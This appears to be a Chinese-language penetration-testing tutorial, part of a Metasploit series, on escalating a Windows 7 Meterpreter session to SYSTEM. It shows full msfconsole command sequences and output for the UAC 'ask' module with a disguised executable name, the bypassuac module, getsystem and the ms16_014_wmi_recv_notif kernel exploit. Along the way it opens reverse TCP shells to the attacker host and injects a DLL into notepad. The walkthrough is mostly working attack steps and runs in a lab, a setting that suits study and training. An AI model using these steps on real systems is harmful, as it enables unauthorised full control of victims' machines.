MSF内网渗透系列2-权限提升

在上篇文章中，通过win7运行msf.exe，kali接收到一个session，但这个session权限只是普通权限，无法做更多的操作。
权限提升
1.提高程序运行级别
2.UAC绕过
3.利用提权漏洞进行提权

提高程序运行级别
msf模块>exploit/windows/local/ask
但会触发UAC，只有当用户同意是才能获得更高权限

  5         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC         192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)

msf5 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: win7-PC\win7
meterpreter > background
[*] Backgrounding session 5...
msf5 exploit(multi/handler) > use exploit/windows/local/ask 
msf5 exploit(windows/local/ask) > info

       Name: Windows Escalate UAC Execute RunAs
     Module: exploit/windows/local/ask
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-01-03

Provided by:
  mubix <mubix@hak5.org>
  b00stfr3ak

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILENAME   QQ.exe           no        File name on disk
  PATH                        no        Location on disk, %TEMP% used if not set
  SESSION    1                yes       The session to run this module on.
  TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)

Payload information:

Description:
  This module will attempt to elevate execution level using the 
  ShellExecute undocumented RunAs flag to bypass low UAC settings.

msf5 exploit(windows/local/ask) >

可以看到session 5只是普通权限，这时候利用ask模块进行提权，该模块需要设置要用来提权的session，以及启动程序的名称

msf5 exploit(windows/local/ask) > set session 5
session => 5
msf5 exploit(windows/local/ask) > set filename execl.exe
filename => execl.exe
msf5 exploit(windows/local/ask) >

ask模块设置完成后，就可以使用了，运行exploit，回到win7，可以看见弹出一个execl.exe程序框，如果你点击是，则kali会获得一个新的session，如果点击否，则kali会得到失败信息。

msf5 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!

Win7 截图：

image.png

win7 点击否，kali返回信息：

msf5 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[-] Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ask) >

win7 点击是，kali获取到新的session

msf5 exploit(windows/local/ask) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading execl.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 6 opened (192.168.159.149:4444 -> 192.168.159.145:49249) at 2020-07-10 15:30:43 +0800
meterpreter >

使用background退出这个meterpreter
使用sessions，查看session
使用sessions -i 6，进入新获取的session
使用getuid查看该session权限
发现还是普通权限
这时候使用getsystem，获得系统权限
再使用getuid查看

msf5 exploit(windows/local/ask) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  5         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC  192.168.159.149:4444 -> 192.168.159.145:49248 (192.168.159.145)
  6         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC  192.168.159.149:4444 -> 192.168.159.145:49249 (192.168.159.145)

msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

UAC绕过
msf模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

这里使用第一个模块进行绕过UAC提权

msf5 > use exploit/windows/local/bypassuac
使用bypassuac模块
msf5 exploit(windows/local/bypassuac) > set session 5
session => 5
设置需要提权的session
msf5 exploit(windows/local/bypassuac) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (180291 bytes) to 192.168.159.145
[*] Meterpreter session 7 opened (192.168.159.149:4444 -> 192.168.159.145:49250) at 2020-07-10 16:00:14 +0800
获得新的session
meterpreter > getuid
Server username: win7-PC\win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
成功提权

利用提权漏洞进行提权
exploit/windows/local/ms14_058_track_popup_menu
等等
这里使用
exploit/windows/local/ms16_014_wmi_recv_notif
这个模块，同样使用info和show options查看信息，只需要设置一个session就可以使用
攻击成功会直接返回一个shell，使用whoami查看权限

msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show options

Module options (exploit/windows/local/ms16_014_wmi_recv_notif):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP0/SP1


msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 8
session => 8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  8         meterpreter x64/windows  win7-PC\win7 @ WIN7-PC  192.168.159.149:4444 -> 192.168.159.145:49251 (192.168.159.145)

msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit

[*] Started reverse TCP handler on 192.168.159.149:4444 
[*] Launching notepad to host the exploit...
[+] Process 1820 launched.
[*] Reflectively injecting the exploit DLL into 1820...
[*] Injecting exploit into 1820...
[*] Exploit injected. Injecting payload into 1820...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 9 opened (192.168.159.149:4444 -> 192.168.159.145:49255) at 2020-07-10 16:29:00 +0800

C:\Users\win7\Desktop>whoami
whoami
nt authority\system

C:\Users\win7\Desktop>

成功提权